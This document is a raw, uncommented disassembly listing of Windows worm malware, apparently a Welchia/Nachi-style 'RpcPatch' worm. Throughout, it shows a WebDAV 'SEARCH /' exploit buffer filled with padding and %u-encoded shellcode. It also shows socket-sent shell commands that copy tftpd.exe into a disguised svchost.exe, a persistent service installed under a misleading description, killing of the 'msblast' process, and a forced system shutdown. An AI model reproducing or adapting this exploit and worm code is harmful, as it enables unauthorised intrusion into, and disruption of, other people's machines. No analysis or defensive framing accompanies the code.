sub_401C80 proc near ; DATA XREF: sub_401990+116�o
var_404 = dword ptr -404h
var_400 = byte ptr -400h
var_3FF = byte ptr -3FFh
arg_0 = dword ptr 4
sub esp, 404h
mov eax, [esp+404h+arg_0]
push ebp
push esi
push edi
mov esi, [eax]
mov ecx, 0FFh
xor eax, eax
lea edi, [esp+410h+var_3FF]
mov [esp+410h+var_400], 0
push 4
rep stosd
lea ecx, [esp+414h+var_404]
mov [esp+414h+var_404], 1388h
stosw
push ecx
push 1006h
push 0FFFFh
push esi
stosb
call dword_404164 ; setsockopt
mov edi, dword_40416C
push 0
lea edx, [esp+414h+var_400]
push 3FFh
push edx
push esi
call edi ; dword_40416C
cmp eax, 0FFFFFFFFh
jz loc_401E54
test eax, eax
jz loc_401E54
mov ebp, dword_404100
lea eax, [esp+410h+var_400]
push offset aMicrosoftWindo ; "Microsoft Windows"
push eax
call ebp ; dword_404100
add esp, 8
test eax, eax
jz loc_401E54
lea ecx, [esp+410h+var_400]
push offset dword_4061BC
push ecx
call ebp ; dword_404100
add esp, 8
test eax, eax
jnz short loc_401D4D
loc_401D1D: ; CODE XREF: sub_401C80+CB�j
push 0
lea edx, [esp+414h+var_400]
push 3FFh
push edx
push esi
call edi ; dword_40416C
cmp eax, 0FFFFFFFFh
jz loc_401E54
mov [esp+eax+410h+var_400], 0
lea eax, [esp+410h+var_400]
push offset dword_4061BC
push eax
call ebp ; dword_404100
add esp, 8
test eax, eax
jz short loc_401D1D
loc_401D4D: ; CODE XREF: sub_401C80+9B�j
lea ecx, [esp+410h+var_400]
push ecx
push offset aDirWinsDllhost ; "dir wins\\dllhost.exe\n\r"
push esi
call sub_401B10
add esp, 0Ch
test eax, eax
jz loc_401E54
lea edx, [esp+410h+var_400]
push offset aDllhost_exe ; "DLLHOST.EXE"
push edx
call ebp ; dword_404100
add esp, 8
test eax, eax
jnz loc_401E54
lea eax, [esp+410h+var_400]
push offset aDllhost_exe_0 ; "dllhost.exe"
push eax
call ebp ; dword_404100
add esp, 8
test eax, eax
jnz loc_401E54
lea ecx, [esp+410h+var_400]
push ecx
push offset aDirDllcacheTft ; "dir dllcache\\tftpd.exe\n\r"
push esi
call sub_401B10
add esp, 0Ch
test eax, eax
jz loc_401E54
lea edx, [esp+410h+var_400]
push offset aTftpd_exe_0 ; "tftpd.exe"
push edx
call ebp ; dword_404100
add esp, 8
test eax, eax
jnz short loc_401DF0
lea eax, [esp+410h+var_400]
push offset aTftpd_exe ; "TFTPD.EXE"
push eax
call ebp ; dword_404100
add esp, 8
test eax, eax
jnz short loc_401DF0
lea ecx, [esp+410h+var_400]
push ecx
push offset dword_407628
push esi
call sub_401B90
add esp, 0Ch
test eax, eax
jz short loc_401E54
jmp short loc_401E07
; ---------------------------------------------------------------------------
loc_401DF0: ; CODE XREF: sub_401C80+142�j
; sub_401C80+155�j
lea edx, [esp+410h+var_400]
push edx
push offset aCopyDllcacheTf ; "copy dllcache\\tftpd.exe wins\\svchost.ex"...
push esi
call sub_401B10
add esp, 0Ch
test eax, eax
jz short loc_401E54
loc_401E07: ; CODE XREF: sub_401C80+16E�j
lea eax, [esp+410h+var_400]
push eax
push offset dword_4075A8
push esi
call sub_401B90
add esp, 0Ch
test eax, eax
jz short loc_401E54
mov ebp, dword_4040C8
push 1F4h
call ebp ; dword_4040C8
mov edi, offset aWinsDllhost_ex ; "wins\\DLLHOST.EXE\n\r"
or ecx, 0FFFFFFFFh
xor eax, eax
push 0
repne scasb
not ecx
dec ecx
push ecx
push offset aWinsDllhost_ex ; "wins\\DLLHOST.EXE\n\r"
push esi
call dword_404168 ; send
test eax, eax
jz short loc_401E54
push 3E8h
call ebp ; dword_4040C8
loc_401E54: ; CODE XREF: sub_401C80+5F�j
; sub_401C80+67�j ...
push esi
call dword_404170 ; closesocket
pop edi
pop esi
mov eax, [esp+408h+arg_0]
pop ebp
test eax, eax
jz short loc_401E72
push eax
call sub_402FC6
add esp, 4
loc_401E72: ; CODE XREF: sub_401C80+1E7�j
mov eax, 1
add esp, 404h
retn 4
sub_401C80 endp
; =============== S U B R O U T I N E =======================================
sub_401E80 proc near ; CODE XREF: sub_401210:loc_401217�p
; sub_401210+17�p
push offset aMicrosoft_com ; "microsoft.com"
call dword_404160 ; gethostbyname
neg eax
sbb eax, eax
neg eax
retn
sub_401E80 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_401EA0 proc near ; CODE XREF: sub_401210:loc_401230�p
var_70 = dword ptr -70h
var_64 = byte ptr -64h
sub esp, 74h
lea eax, [esp+74h+var_64]
push esi
push 64h
push eax
call dword_404158 ; gethostname
cmp eax, 0FFFFFFFFh
jz short loc_401F1D
lea ecx, [esp+78h+var_64]
push ecx
call dword_404160 ; gethostbyname
test eax, eax
jz short loc_401F1D
mov edx, [eax+0Ch]
mov esi, [edx]
test esi, esi
jz short loc_401F1D
movsx ecx, word ptr [eax+0Ah]
mov eax, ecx
push edi
lea edi, [esp+7Ch+var_70]
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
mov ecx, [esp+7Ch+var_70]
push ecx
call dword_40415C ; inet_ntoa
mov edi, eax
or ecx, 0FFFFFFFFh
xor eax, eax
repne scasb
not ecx
sub edi, ecx
mov eax, 1
mov edx, ecx
mov esi, edi
mov edi, offset dword_407478
shr ecx, 2
rep movsd
mov ecx, edx
and ecx, 3
rep movsb
pop edi
pop esi
add esp, 74h
retn
; ---------------------------------------------------------------------------
loc_401F1D: ; CODE XREF: sub_401EA0+14�j
; sub_401EA0+23�j ...
xor eax, eax
pop esi
add esp, 74h
retn
sub_401EA0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_401F30 proc near ; CODE XREF: sub_401280+A5�p
var_50 = byte ptr -50h
sub esp, 50h
or ecx, 0FFFFFFFFh
xor eax, eax
push esi
push edi
mov edi, offset aSearch ; "SEARCH /"
repne scasb
not ecx
sub edi, ecx
mov eax, ecx
mov esi, edi
mov edi, ds:dword_4075A0
shr ecx, 2
rep movsd
mov ecx, eax
mov eax, 41414141h
and ecx, 3
rep movsb
mov edx, ds:dword_4075A0
mov ecx, 41h
mov dword_406424, 8
mov esi, offset aU5951U6858U759 ; "%u5951%u6858%u759f%u0018%u5951%u6858%u7"...
lea edi, [edx+8]
rep stosd
stosb
mov eax, dword_406424
mov edx, ds:dword_4075A0
add eax, 105h
mov ecx, 41414141h
mov dword_406424, eax
add eax, edx
mov [eax], ecx
mov [eax+4], ecx
mov eax, dword_406424
mov ecx, ds:dword_4075A0
add eax, 8
mov dword_406424, eax
lea edi, [eax+ecx]
mov ecx, 30h
rep movsd
movsb
mov eax, dword_406424
mov edx, ds:dword_4075A0
add eax, 0C0h
mov ecx, 31h
mov esi, offset aU5390U665eU66a ; "%u5390%u665e%u66ad%u993d%u7560%u56f8%u5"...
mov dword_406424, eax
lea edi, [eax+edx]
rep movsd
movsw
movsb
mov eax, dword_406424
mov ecx, ds:dword_4075A0
add eax, 0C6h
mov esi, offset aFfilomidomfafd ; "ffilomidomfafdfgfhinhnlaljbeaaaaaalimmm"...
mov dword_406424, eax
lea edi, [eax+ecx]
mov ecx, 55h
rep movsd
movsb
mov edx, dword_406424
mov esi, ds:dword_4075A0
add edx, 154h
mov ecx, 3F52h
mov eax, 4E4E4E4Eh
mov dword_406424, edx
lea edi, [edx+esi]
mov esi, offset aHttp1_1Host127 ; " HTTP/1.1\r\nHost: 127.0.0.1\r\nContent-Typ"...
rep stosd
stosw
mov eax, dword_406424
mov edx, ds:dword_4075A0
mov ecx, 14h
lea edi, [esp+58h+var_50]
add eax, 0FD4Ah
rep movsd
lea edi, [eax+edx]
mov ecx, 14h
lea esi, [esp+58h+var_50]
mov dword_406424, eax
rep movsd
mov eax, dword_406424
mov esi, offset loc_40597E
add eax, 4Fh
mov dword_406424, eax
lea ecx, [eax+0E7h]
lea edx, [eax+0ECh]
mov dword_40642C, ecx
mov ecx, ds:dword_4075A0
mov ds:dword_407470, edx
lea edi, [eax+ecx]
mov ecx, 5Dh
rep movsd
movsw
mov eax, dword_406424
mov esi, ds:dword_4075A0
mov cx, word_406238
mov dl, byte_40623A
add eax, 175h
pop edi
mov dword_406424, eax
add eax, esi
pop esi
mov [eax], cx
mov [eax+2], dl
mov eax, dword_406424
add eax, 2
mov dword_406424, eax
add esp, 50h
retn
sub_401F30 endp
; =============== S U B R O U T I N E =======================================
sub_4020E0 proc near ; CODE XREF: sub_401210+57�p
mov ax, word_405B68
push eax
call dword_404174 ; ntohs
mov ecx, ds:dword_4075A0
mov edx, dword_40642C
xor eax, 9999h
push offset dword_407478
mov [edx+ecx], ax
call dword_404194 ; inet_addr
mov ecx, ds:dword_4075A0
mov edx, ds:dword_407470
xor eax, 99999999h
mov [edx+ecx], eax
retn
sub_4020E0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_402130 proc near ; CODE XREF: sub_401210+5C�p
mov ax, word_405B68
push eax
call dword_404174 ; ntohs
mov ecx, dword_406428
xor eax, 9999h
push offset dword_407478
mov word ptr dword_406470[ecx], ax
call dword_404194 ; inet_addr
mov edx, ds:dword_407474
xor eax, 99999999h
mov dword_406470[edx], eax
retn
sub_402130 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_402170 proc near ; CODE XREF: sub_401280+AA�p
push esi
mov eax, dword_4057DC
push edi
mov ecx, 0D8h
mov esi, offset dword_40547C
mov edi, offset dword_406470
rep movsd
mov ecx, dword_4057E4
add eax, 166h
add ecx, 166h
mov dword_4057DC, eax
mov dword_4057E4, ecx
mov dword_4067D8, ecx
mov ecx, dword_4057E8
mov dword_4067D0, eax
mov eax, dword_4057E0
mov dword_4067DC, ecx
mov ecx, 0B3h
mov esi, offset aFxnbfxfxnbfxfx ; "FXNBFXFXNBFXFXFXFX"
mov edi, offset dword_4067E0
mov edx, dword_405484
mov dword_40584C, 100139Dh
mov dword_4067D4, eax
rep movsd
mov ecx, 0Fh
mov esi, offset aC1234561111111 ; "\\C$\\123456111111111111111.doc"
mov edi, offset dword_406AAC
add edx, 2C0h
rep movsd
mov ecx, 0Ch
mov esi, offset dword_405AF4
mov edi, offset dword_406AE8
mov eax, 2C0h
rep movsd
mov esi, dword_406480
mov ecx, dword_4064F4
mov edi, dword_406524
mov dword_406478, edx
mov edx, dword_4064F0
add esi, eax
add edx, eax
add ecx, eax
mov dword_406480, esi
mov esi, dword_406528
mov dword_4064F0, edx
mov edx, dword_406540
mov dword_4064F4, ecx
mov ecx, dword_4065FC
add edi, eax
add esi, eax
mov dword_406524, edi
add edx, eax
add ecx, eax
mov dword_406528, esi
pop edi
mov dword_406428, 5ADh
mov ds:dword_407474, 5B2h
mov dword_406420, 6A8h
mov dword_406540, edx
mov dword_4065FC, ecx
pop esi
retn
sub_402170 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_4022A0 proc near ; CODE XREF: sub_401780+1E8�p
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = byte ptr -0Ch
var_4 = dword ptr -4
arg_0 = dword ptr 4
sub esp, 14h
lea eax, [esp+14h+var_14]
push eax
push 28h
call dword_40409C ; GetCurrentProcess
push eax
call dword_404044 ; OpenProcessToken
lea ecx, [esp+14h+var_C]
push ecx
push offset aSeshutdownpriv ; "SeShutdownPrivilege"
push 0
call dword_404048 ; LookupPrivilegeValueA
mov eax, [esp+14h+var_14]
push 0
push 0
lea edx, [esp+1Ch+var_10]
push 0
push edx
push 0
push eax
mov [esp+2Ch+var_10], 1
mov [esp+2Ch+var_4], 2
call dword_404028 ; AdjustTokenPrivileges
mov ecx, [esp+14h+arg_0]
push 0
or ecx, 4
push ecx
call dword_404148 ; ExitWindowsEx
add esp, 14h
retn
sub_4022A0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_402310 proc near ; CODE XREF: sub_401780+8�p
var_9C = dword ptr -9Ch
var_94 = dword ptr -94h
sub esp, 9Ch
call dword_404094 ; GetVersion
and eax, 0FFh
lea ecx, [esp+9Ch+var_9C]
cmp eax, 5
push ecx
sbb eax, eax
and al, 0F8h
add eax, 9Ch
mov [esp+0A0h+var_9C], eax
call dword_404098 ; GetVersionExA
mov eax, [esp+9Ch+var_94]
add esp, 9Ch
retn
sub_402310 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_402350 proc near ; CODE XREF: sub_402390+D�p
; sub_402390+21�p ...
arg_0 = dword ptr 4
mov ecx, [esp+arg_0]
lea eax, [esp+arg_0]
push eax
push 1
push 0
push ecx
push 80000002h
call dword_40403C ; RegOpenKeyExA
test eax, eax
jnz short loc_40237E
mov edx, [esp+arg_0]
push edx
call dword_404040 ; RegCloseKey
mov eax, 1
retn
; ---------------------------------------------------------------------------
loc_40237E: ; CODE XREF: sub_402350+1B�j
xor eax, eax
retn
sub_402350 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_402390 proc near ; CODE XREF: sub_401780+1D�p
; sub_401780+1DA�p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
test eax, eax
jnz short loc_4023AC
push offset aSoftwareMicros ; "SOFTWARE\\Microsoft\\Updates\\Windows 2000"...
call sub_402350
add esp, 4
neg eax
sbb eax, eax
neg eax
retn
; ---------------------------------------------------------------------------
loc_4023AC: ; CODE XREF: sub_402390+6�j
push offset aSoftwareMicr_0 ; "SOFTWARE\\Microsoft\\Updates\\Windows XP\\S"...
call sub_402350
add esp, 4
test eax, eax
jnz short loc_4023CF
push offset aSoftwareMicr_1 ; "SOFTWARE\\Microsoft\\Updates\\Windows XP\\S"...
call sub_402350
add esp, 4
test eax, eax
jnz short loc_4023CF
retn
; ---------------------------------------------------------------------------
loc_4023CF: ; CODE XREF: sub_402390+2B�j
; sub_402390+3C�j
mov eax, 1
retn
sub_402390 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_4023E0 proc near ; CODE XREF: sub_4015E0+61�p
; sub_401660+5C�p
var_110 = dword ptr -110h
var_10C = dword ptr -10Ch
var_108 = byte ptr -108h
var_107 = byte ptr -107h
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
arg_C = dword ptr 10h
sub esp, 110h
push ebx
push ebp
push esi
push edi
push 0F003Fh
push 0
push 0
call dword_40402C ; OpenSCManagerA
mov ebp, eax
test ebp, ebp
jnz short loc_40240A
pop edi
pop esi
pop ebp
pop ebx
add esp, 110h
retn
; ---------------------------------------------------------------------------
loc_40240A: ; CODE XREF: sub_4023E0+1D�j
mov ecx, 41h
xor eax, eax
lea edi, [esp+120h+var_107]
mov [esp+120h+var_108], 0
rep stosd
mov edi, [esp+120h+arg_8]
lea eax, [esp+120h+var_108]
push edi
push offset aCWindowsSystem ; "C:\\WINDOWS\\system32"
push offset aSWinsS ; "%s\\wins\\%s"
push eax
call dword_40411C ; sprintf
push offset aSvchost_exe ; "svchost.exe"
push edi
mov esi, 2
call dword_404140 ; _stricmp
add esp, 18h
test eax, eax
jnz short loc_402456
mov esi, 3
loc_402456: ; CODE XREF: sub_4023E0+6F�j
push 0
mov edx, [esp+124h+arg_4]
push 0
mov eax, [esp+128h+arg_0]
push 0
push 0
lea ecx, [esp+130h+var_108]
push 0
push ecx
push 0
push esi
push 110h
push 0F01FFh
push edx
push eax
push ebp
call dword_404030 ; CreateServiceA
mov ebx, eax
test ebx, ebx
jnz short loc_4024A3
push ebp
call dword_404034 ; CloseServiceHandle
pop edi
pop esi
pop ebp
xor eax, eax
pop ebx
add esp, 110h
retn
; ---------------------------------------------------------------------------
loc_4024A3: ; CODE XREF: sub_4023E0+AD�j
mov ecx, [esp+120h+arg_C]
push 0F01FFh
push ecx
push ebp
mov [esp+12Ch+var_110], offset aManagesNetwork ; "Manages network configuration by updati"...
xor esi, esi
call dword_404038 ; OpenServiceA
mov edi, eax
test edi, edi
jz short loc_402507
push 400h
push 40h
mov [esp+128h+var_10C], esi
call dword_40408C ; LocalAlloc
mov esi, eax
test esi, esi
jz short loc_4024FC
lea edx, [esp+120h+var_10C]
push edx
push 400h
push esi
push 1
push edi
call dword_404004 ; QueryServiceConfig2A
test eax, eax
jz short loc_4024FC
mov eax, [esi]
mov [esp+120h+var_110], eax
loc_4024FC: ; CODE XREF: sub_4023E0+FC�j
; sub_4023E0+114�j
push edi
mov edi, dword_404034
call edi ; dword_404034
jmp short loc_40250D
; ---------------------------------------------------------------------------
loc_402507: ; CODE XREF: sub_4023E0+E5�j
mov edi, dword_404034
loc_40250D: ; CODE XREF: sub_4023E0+125�j
lea ecx, [esp+120h+var_110]
push ecx
push 1
push ebx
call dword_404000 ; ChangeServiceConfig2A
test esi, esi
jz short loc_402526
push esi
call dword_404090 ; LocalFree
loc_402526: ; CODE XREF: sub_4023E0+13D�j
push ebx
call edi ; dword_404034
push ebp
call edi ; dword_404034
pop edi
pop esi
pop ebp
mov eax, 1
pop ebx
add esp, 110h
retn
sub_4023E0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_402540 proc near ; CODE XREF: sub_401280+EC�p
; sub_401280+110�p
var_134 = dword ptr -134h
var_130 = dword ptr -130h
var_12C = dword ptr -12Ch
var_128 = dword ptr -128h
var_124 = dword ptr -124h
var_120 = byte ptr -120h
var_11C = dword ptr -11Ch
var_118 = byte ptr -118h
var_114 = dword ptr -114h
var_104 = dword ptr -104h
var_100 = dword ptr -100h
arg_0 = dword ptr 4
sub esp, 134h
push ebp
push edi
push 0F003Fh
push 0
push 0
call dword_40402C ; OpenSCManagerA
mov ebp, eax
test ebp, ebp
mov [esp+13Ch+var_134], ebp
jnz short loc_40256A
pop edi
pop ebp
add esp, 134h
retn
; ---------------------------------------------------------------------------
loc_40256A: ; CODE XREF: sub_402540+1F�j
push offset aCWindowsSystem ; "C:\\WINDOWS\\system32"
lea eax, [esp+140h+var_104]
push offset aDSWins ; "-d%s\\wins"
push eax
mov [esp+148h+var_130], 0
call dword_40411C ; sprintf
mov edx, [esp+148h+arg_0]
add esp, 0Ch
lea ecx, [esp+13Ch+var_104]
push 0F01FFh
push edx
push ebp
mov [esp+148h+var_128], ecx
call dword_404038 ; OpenServiceA
mov edi, eax
test edi, edi
jnz short loc_4025B5
pop edi
pop ebp
add esp, 134h
retn
; ---------------------------------------------------------------------------
loc_4025B5: ; CODE XREF: sub_402540+6A�j
push ebx
push esi
push 400h
push 40h
call dword_40408C ; LocalAlloc
mov esi, dword_40401C
mov ebx, eax
lea eax, [esp+13Ch+var_118]
mov [esp+13Ch+var_124], ebx
push eax
push edi
call esi ; dword_40401C
test eax, eax
jnz short loc_4025E3
xor esi, esi
jmp loc_40270E
; ---------------------------------------------------------------------------
loc_4025E3: ; CODE XREF: sub_402540+9A�j
mov eax, [esp+13Ch+var_114]
cmp eax, 4
jz loc_402709
cmp eax, 2
jz loc_402709
lea ecx, [esp+13Ch+var_11C]
push ecx
push 400h
push ebx
push edi
call dword_404020 ; QueryServiceConfigA
test eax, eax
jnz short loc_402616
xor esi, esi
jmp loc_40270E
; ---------------------------------------------------------------------------
loc_402616: ; CODE XREF: sub_402540+CD�j
cmp dword ptr [ebx+4], 4
jnz short loc_402642
push 0
push 0
push 0
push 0
push 0
push 0
push 0
push 0FFFFFFFFh
push 3
push 0FFFFFFFFh
push edi
call dword_404024 ; ChangeServiceConfigA
test eax, eax
jnz short loc_402642
xor esi, esi
jmp loc_40270E
; ---------------------------------------------------------------------------
loc_402642: ; CODE XREF: sub_402540+DA�j
; sub_402540+F9�j
lea edx, [esp+13Ch+var_120]
push edx
push 1
push edi
call dword_404008 ; StartServiceA
test eax, eax
jnz short loc_40265B
xor esi, esi
jmp loc_40270E
; ---------------------------------------------------------------------------
loc_40265B: ; CODE XREF: sub_402540+112�j
lea eax, [esp+13Ch+var_118]
push eax
push edi
call esi ; dword_40401C
test eax, eax
jnz short loc_40266E
xor esi, esi
jmp loc_40270E
; ---------------------------------------------------------------------------
loc_40266E: ; CODE XREF: sub_402540+125�j
cmp [esp+13Ch+var_114], 2
jnz loc_4026F9
mov ebp, dword_4040C8
mov ebx, dword_4040C0
mov esi, [esp+13Ch+var_11C]
loc_402689: ; CODE XREF: sub_402540+1AF�j
mov eax, 0CCCCCCCDh
mul [esp+13Ch+var_100]
shr edx, 3
cmp edx, 3E8h
jnb short loc_4026A4
mov edx, 3E8h
jmp short loc_4026B1
; ---------------------------------------------------------------------------
loc_4026A4: ; CODE XREF: sub_402540+15B�j
cmp edx, 2710h
jbe short loc_4026B1
mov edx, 2710h
loc_4026B1: ; CODE XREF: sub_402540+162�j
; sub_402540+16A�j
push edx
call ebp ; dword_4040C8
lea ecx, [esp+13Ch+var_118]
push ecx
push edi
call dword_40401C ; QueryServiceStatus
test eax, eax
jz short loc_4026F1
mov edx, [esp+13Ch+var_128]
mov eax, [esp+13Ch+var_104]
cmp eax, edx
jbe short loc_4026DE
call ebx ; dword_4040C0
mov esi, eax
mov eax, [esp+13Ch+var_104]
mov [esp+13Ch+var_128], eax
jmp short loc_4026EA
; ---------------------------------------------------------------------------
loc_4026DE: ; CODE XREF: sub_402540+18E�j
call ebx ; dword_4040C0
mov ecx, [esp+13Ch+var_100]
sub eax, esi
cmp eax, ecx
ja short loc_4026F1
loc_4026EA: ; CODE XREF: sub_402540+19C�j
cmp [esp+13Ch+var_114], 2
jz short loc_402689
loc_4026F1: ; CODE XREF: sub_402540+182�j
; sub_402540+1A8�j
mov ebp, [esp+13Ch+var_12C]
mov ebx, [esp+13Ch+var_124]
loc_4026F9: ; CODE XREF: sub_402540+133�j
mov eax, [esp+13Ch+var_114]
xor ecx, ecx
cmp eax, 4
setz cl
mov esi, ecx
jmp short loc_40270E
; ---------------------------------------------------------------------------
loc_402709: ; CODE XREF: sub_402540+AA�j
; sub_402540+B3�j
mov esi, 1
loc_40270E: ; CODE XREF: sub_402540+9E�j
; sub_402540+D1�j ...
push ebx
call dword_404090 ; LocalFree
push edi
mov edi, dword_404034
call edi ; dword_404034
push ebp
call edi ; dword_404034
mov eax, esi
pop esi
pop ebx
pop edi
pop ebp
add esp, 134h
retn
sub_402540 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_402730 proc near ; CODE XREF: sub_4011C0+1F�p
var_1C = byte ptr -1Ch
var_18 = dword ptr -18h
sub esp, 1Ch
push esi
push edi
push 80000000h
push 0
push 0
call dword_40402C ; OpenSCManagerA
mov edi, eax
test edi, edi
jnz short loc_402755
pop edi
mov eax, 11111111h
pop esi
add esp, 1Ch
retn
; ---------------------------------------------------------------------------
loc_402755: ; CODE XREF: sub_402730+18�j
push 0F01FFh
push offset aRpcpatch ; "RpcPatch"
push edi
call dword_404038 ; OpenServiceA
mov esi, eax
test esi, esi
jnz short loc_402777
pop edi
mov eax, 22222222h
pop esi
add esp, 1Ch
retn
; ---------------------------------------------------------------------------
loc_402777: ; CODE XREF: sub_402730+3A�j
lea eax, [esp+24h+var_1C]
push eax
push esi
call dword_40401C ; QueryServiceStatus
test eax, eax
push esi
mov esi, dword_404034
jnz short loc_40279E
call esi ; dword_404034
push edi
call esi ; dword_404034
pop edi
mov eax, 33333333h
pop esi
add esp, 1Ch
retn
; ---------------------------------------------------------------------------
loc_40279E: ; CODE XREF: sub_402730+5C�j
call esi ; dword_404034
push edi
call esi ; dword_404034
mov eax, [esp+24h+var_18]
pop edi
pop esi
add esp, 1Ch
retn
sub_402730 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_4027B0 proc near ; CODE XREF: sub_4011C0+6�p
push offset aRpcpatch_mutex ; "RpcPatch_Mutex"
push 0
push 0
call dword_404084 ; CreateMutexA
test eax, eax
jz short loc_4027D3
call dword_404060 ; RtlGetLastWin32Error
cmp eax, 0B7h
jz short loc_4027D3
xor eax, eax
retn
; ---------------------------------------------------------------------------
loc_4027D3: ; CODE XREF: sub_4027B0+11�j
; sub_4027B0+1E�j
mov eax, 1
retn
sub_4027B0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_4027E0 proc near ; CODE XREF: sub_4011C0:loc_4011FC�j
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
sub esp, 10h
xor eax, eax
mov [esp+10h+var_10], offset aRpcpatch ; "RpcPatch"
mov [esp+10h+var_8], eax
mov [esp+10h+var_4], eax
lea eax, [esp+10h+var_10]
mov [esp+10h+var_C], offset loc_402920
push eax
call dword_404018 ; StartServiceCtrlDispatcherA
neg eax
sbb eax, eax
neg eax
dec eax
add esp, 10h
retn
sub_4027E0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_402820 proc near ; CODE XREF: sub_402880+1A�p
; sub_402880+33�p ...
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
sub esp, 1Ch
mov eax, [esp+1Ch+arg_0]
mov ecx, [esp+1Ch+arg_8]
mov dword_405BA0, eax
mov [esp+1Ch+var_18], eax
mov eax, [esp+1Ch+arg_4]
lea edx, [esp+1Ch+var_1C]
mov [esp+1Ch+var_10], eax
mov eax, ds:dword_4076A8
push edx
push eax
mov [esp+24h+var_1C], 10h
mov [esp+24h+var_14], 5
mov [esp+24h+var_C], 0
mov [esp+24h+var_8], ecx
mov [esp+24h+var_4], 0BB8h
call dword_404014 ; SetServiceStatus
add esp, 1Ch
retn
sub_402820 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_402880 proc near ; DATA XREF: seg000:loc_402920�o
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
dec eax
cmp eax, 3 ; switch 4 cases
ja short locret_402909 ; default
jmp off_40290C[eax*4] ; switch jump
loc_402891: ; DATA XREF: seg000:off_40290C�o
push 1388h ; jumptable 0040288A case 0
push 0
push 3
call sub_402820
add esp, 0Ch
push 3E8h
call dword_4040C8 ; Sleep
push 0
push 0
push 1
call sub_402820
add esp, 0Ch
retn 4
; ---------------------------------------------------------------------------
loc_4028BE: ; CODE XREF: sub_402880+A�j
; DATA XREF: seg000:off_40290C�o
push 1 ; jumptable 0040288A case 1
push 0
push 6
call sub_402820
push 0
push 0
push 7
call sub_402820
add esp, 18h
retn 4
; ---------------------------------------------------------------------------
loc_4028DA: ; CODE XREF: sub_402880+A�j
; DATA XREF: seg000:off_40290C�o
push 1 ; jumptable 0040288A case 2
push 0
push 5
call sub_402820
push 0
push 0
push 4
call sub_402820
add esp, 18h
retn 4
; ---------------------------------------------------------------------------
loc_4028F6: ; CODE XREF: sub_402880+A�j
; DATA XREF: seg000:off_40290C�o
mov ecx, dword_405BA0 ; jumptable 0040288A case 3
push 0
push 0
push ecx
call sub_402820
add esp, 0Ch
locret_402909: ; CODE XREF: sub_402880+8�j
retn 4 ; default
sub_402880 endp
; ---------------------------------------------------------------------------
off_40290C dd offset loc_402891 ; DATA XREF: sub_402880+A�r
dd offset loc_4028BE ; jump table for switch statement
dd offset loc_4028DA
dd offset loc_4028F6
align 10h
loc_402920: ; DATA XREF: sub_4027E0+19�o
push offset sub_402880
push offset aRpcpatch ; "RpcPatch"
call dword_404010 ; RegisterServiceCtrlHandlerA
test eax, eax
mov ds:dword_4076A8, eax
jz short locret_40296D
push 1
push 0
push 2
call sub_402820
push 0
push 0
push 4
call sub_402820
call sub_401280
push 0
push 0
push 3
call sub_402820
push 0
push 0
push 1
call sub_402820
add esp, 30h
locret_40296D: ; CODE XREF: seg000:00402937�j
retn 8
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402970 proc near ; CODE XREF: sub_401280+4E�p
var_210 = byte ptr -210h
var_10C = byte ptr -10Ch
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 210h
push esi
mov esi, dword_4040A8
lea eax, [ebp+var_10C]
push 104h
push eax
push 0
call esi ; dword_4040A8
lea ecx, [ebp+var_10C]
push ecx
call dword_404074 ; GetFileAttributesA
test al, 1
jz short loc_4029B1
and al, 0FEh
lea edx, [ebp+var_10C]
push eax
push edx
call dword_404078 ; SetFileAttributesA
loc_4029B1: ; CODE XREF: sub_402970+2F�j
push 0
call dword_40407C ; GetModuleHandleA
lea ecx, [ebp+var_210]
push 104h
push ecx
push eax
mov [ebp+var_4], eax
call esi ; dword_4040A8
push 4
call dword_4040E0 ; CloseHandle
lea eax, [ebp+var_210]
push 0
push 0
push eax
push dword_4040BC
push [ebp+var_4]
push dword_4040E8
push dword_404080
retn
sub_402970 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
pop esi
mov esp, ebp
pop ebp
retn
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_402A00 proc near ; CODE XREF: sub_401280+1E�p
; sub_401280+1D9�p
var_108 = byte ptr -108h
var_107 = byte ptr -107h
sub esp, 108h
push esi
push edi
push offset aMsblast ; "msblast"
call sub_401000
add esp, 4
test eax, eax
jz short loc_402A48
push eax
push 0
push 1F0FFFh
call dword_404070 ; OpenProcess
mov esi, eax
test esi, esi
jz short loc_402A48
push 1
push esi
call dword_4040AC ; TerminateProcess
push 1388h
call dword_4040C8 ; Sleep
push esi
call dword_4040E0 ; CloseHandle
loc_402A48: ; CODE XREF: sub_402A00+17�j
; sub_402A00+2B�j
